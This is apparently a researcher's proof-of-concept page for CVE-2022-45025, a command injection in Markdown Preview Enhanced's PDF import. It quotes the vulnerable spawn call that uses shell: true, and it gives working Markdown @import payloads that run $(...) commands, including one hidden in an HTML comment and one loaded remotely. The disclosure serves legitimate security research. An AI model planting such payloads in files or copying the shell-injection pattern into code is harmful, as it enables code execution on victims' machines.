
CVE-2022-45025 PoC — Markdown Preview Enhanced OS Command Injection Vulnerability

Source: https://github.com/yuriisanin/CVE-2022-45025

Associated vulnerability
Title: Markdown Preview Enhanced OS command injection vulnerability (CVE-2022-45025)
Description: Markdown Preview Enhanced is a powerful Markdown extension by the individual developer Yiyi Wang. Markdown Preview Enhanced v0.6.5 and v0.19.6 contain an OS command injection vulnerability: an attacker can execute injected commands through the PDF import feature.

Repository description: [PoC] Command injection via PDF import in Markdown Preview Enhanced (VSCode, Atom)

Readme
# CVE-2022-45025
Command injection via PDF import in Markdown Preview Enhanced ([VSCode](https://marketplace.visualstudio.com/items?itemName=shd101wyy.markdown-preview-enhanced), [Atom](https://atom.io/packages/markdown-preview-enhanced))

## Description

The [Mume](https://github.com/shd101wyy/mume) markdown tool library was vulnerable to command injection because it invoked `pdf2svg` through `spawn` with the `{shell: true}` option: the argument list is handed to a shell as a single command line, so a `$(...)` substitution embedded in the attacker-controlled PDF path is executed before `pdf2svg` ever runs. This allows an attacker to achieve arbitrary code execution by tricking a victim into opening a specially crafted Markdown file in VSCode or Atom. The library powers the Markdown Preview Enhanced plugin for both [VSCode](https://github.com/shd101wyy/vscode-markdown-preview-enhanced) and [Atom](https://github.com/shd101wyy/markdown-preview-enhanced).


Vulnerable [code snippet](https://github.com/shd101wyy/mume/blob/7135d7606a6a57de6e2372c26a2f16bb98ecf2b2/src/pdf.ts) (imports added for context; the `spawn` call is as in the original):
```ts
import { spawn } from "child_process";
import * as path from "path";

// Vulnerable: `shell: true` joins the command and arguments into one
// command line for /bin/sh, so the manually added double quotes do not
// stop `$(...)` or backticks inside pdfFilePath from being expanded.
const task = spawn(
  "pdf2svg",
  [
    `"${pdfFilePath}"`,
    `"${path.resolve(svgDirectoryPath, svgFilePrefix + "%d.svg")}"`,
    "all",
  ],
  { shell: true },
);
```

## Proof of Concept

The following Markdown document allows an attacker to execute an arbitrary command:

```md
@import "$(open -a Calculator > /dev/null | exit 0)hello.pdf"

The following comment will be recognised by MPE as a valid "@import" command:

<!-- @import "$(open -a Calculator > /dev/null | exit 0)hello.pdf" -->
```

Alternatively, the payload can be pulled in from an external source:
```md
<!-- @import "https://raw.githubusercontent.com/yuriisanin/CVE-2022-45025/main/examples/malicious.md" -->
```

**DEMO for both [VSCode](https://www.youtube.com/watch?v=bnK5DPdb5JU) and [Atom](https://www.youtube.com/watch?v=WxMVwkYrDzI) on YouTube.**

![vscode-rce-poc-gif](https://github.com/yuriisanin/CVE-2022-45025/blob/c60ece758e623176bc21461ef93604efa15d4e63/assets/mde-rce-short.gif)


## Support

You can follow me on [Twitter](https://twitter.com/SaninYurii), [GitHub](https://github.com/yuriisanin) or [YouTube](https://www.youtube.com/channel/UCLN2EvGxtnucEdrI21PmJZg).
File snapshot (cached repository contents)

```
/data/pocs/9a365cba0f29eb3f83ff6c1b7501abb962dfc243
├── assets
│   └── mde-rce-short.gif   (3.1M)
├── examples
│   └── malicious.md        (106 bytes)
└── README.md               (2.0K)

2 directories, 3 files
```